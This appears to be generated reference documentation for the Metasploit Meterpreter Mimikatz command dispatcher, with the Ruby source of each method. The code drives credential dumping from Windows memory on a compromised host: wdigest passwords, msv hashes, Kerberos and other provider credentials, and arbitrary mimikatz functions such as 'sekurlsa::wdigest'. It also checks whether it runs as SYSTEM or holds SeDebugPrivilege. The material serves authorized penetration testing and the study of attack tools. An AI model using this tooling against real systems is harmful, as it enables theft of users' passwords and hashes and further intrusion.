class Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Mimikatz
Mimikatz
extension - grabs credentials from windows memory.
Benjamin DELPY `gentilkiwi` blog.gentilkiwi.com/mimikatz
extension converted by Ben Campbell (Meatballs)
Constants
- Klass
Public Class Methods
new(shell)
click to toggle source
Initializes an instance of the priv command interaction.
Calls superclass method
Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::new
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 26 def initialize(shell) super if (client.platform =~ /x86/) and (client.sys.config.sysinfo['Architecture'] =~ /x64/) print_line print_warning "Loaded x86 Mimikatz on an x64 architecture." end end
Public Instance Methods
cmd_kerberos(*args)
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 141 def cmd_kerberos(*args) method = Proc.new { client.mimikatz.kerberos } mimikatz_request("kerberos", method) end
cmd_livessp(*args)
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 126 def cmd_livessp(*args) method = Proc.new { client.mimikatz.livessp } mimikatz_request("livessp", method) end
cmd_mimikatz_command(*args)
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 55 def cmd_mimikatz_command(*args) if (args.length == 0) args.unshift("-h") end cmd_args = nil cmd_func = nil arguments = [] @@command_opts.parse(args) { |opt, idx, val| case opt when "-a" cmd_args = val when "-f" cmd_func = val when "-h" print( "Usage: mimikatz_command -f func -a args\n\n" + "Executes a mimikatz command on the remote machine.\n" + "e.g. mimikatz_command -f sekurlsa::wdigest -a \"full\"\n" + @@command_opts.usage) return true end } unless cmd_func print_error("You must specify a function with -f") return true end if cmd_args arguments = cmd_args.split(" ") end print_line client.mimikatz.send_custom_command(cmd_func, arguments) end
cmd_msv(*args)
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 121 def cmd_msv(*args) method = Proc.new { client.mimikatz.msv } mimikatz_request("msv", method) end
cmd_ssp(*args)
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 131 def cmd_ssp(*args) method = Proc.new { client.mimikatz.ssp } mimikatz_request("ssp", method) end
cmd_tspkg(*args)
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 136 def cmd_tspkg(*args) method = Proc.new { client.mimikatz.tspkg } mimikatz_request("tspkg", method) end
cmd_wdigest(*args)
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 116 def cmd_wdigest(*args) method = Proc.new { client.mimikatz.wdigest } mimikatz_request("wdigest", method) end
commands()
click to toggle source
List of supported commands.
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 37 def commands { "mimikatz_command" => "Run a custom command", "wdigest" => "Attempt to retrieve wdigest creds", "msv" => "Attempt to retrieve msv creds (hashes)", "livessp" => "Attempt to retrieve livessp creds", "ssp" => "Attempt to retrieve ssp creds", "tspkg" => "Attempt to retrieve tspkg creds", "kerberos" => "Attempt to retrieve kerberos creds" } end
get_privs()
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 146 def get_privs unless system_check print_status("Attempting to getprivs") privs = client.sys.config.getprivs unless privs.include? "SeDebugPrivilege" print_warning("Did not get SeDebugPrivilege") else print_good("Got SeDebugPrivilege") end else print_good("Running as SYSTEM") end end
mimikatz_request(provider, method)
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 92 def mimikatz_request(provider, method) get_privs print_status("Retrieving #{provider} credentials") accounts = method.call table = Rex::Ui::Text::Table.new( 'Header' => "#{provider} credentials", 'Indent' => 0, 'SortIndex' => 4, 'Columns' => [ 'AuthID', 'Package', 'Domain', 'User', 'Password' ] ) accounts.each do |acc| table << [acc[:authid], acc[:package], acc[:domain], acc[:user], (acc[:password] || "").gsub("\n","")] end print_line table.to_s return true end
name()
click to toggle source
Name for this dispatcher
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 172 def name "Mimikatz" end
system_check()
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 160 def system_check unless (client.sys.config.getuid == "NT AUTHORITY\\SYSTEM") print_warning("Not currently running as SYSTEM") return false end return true end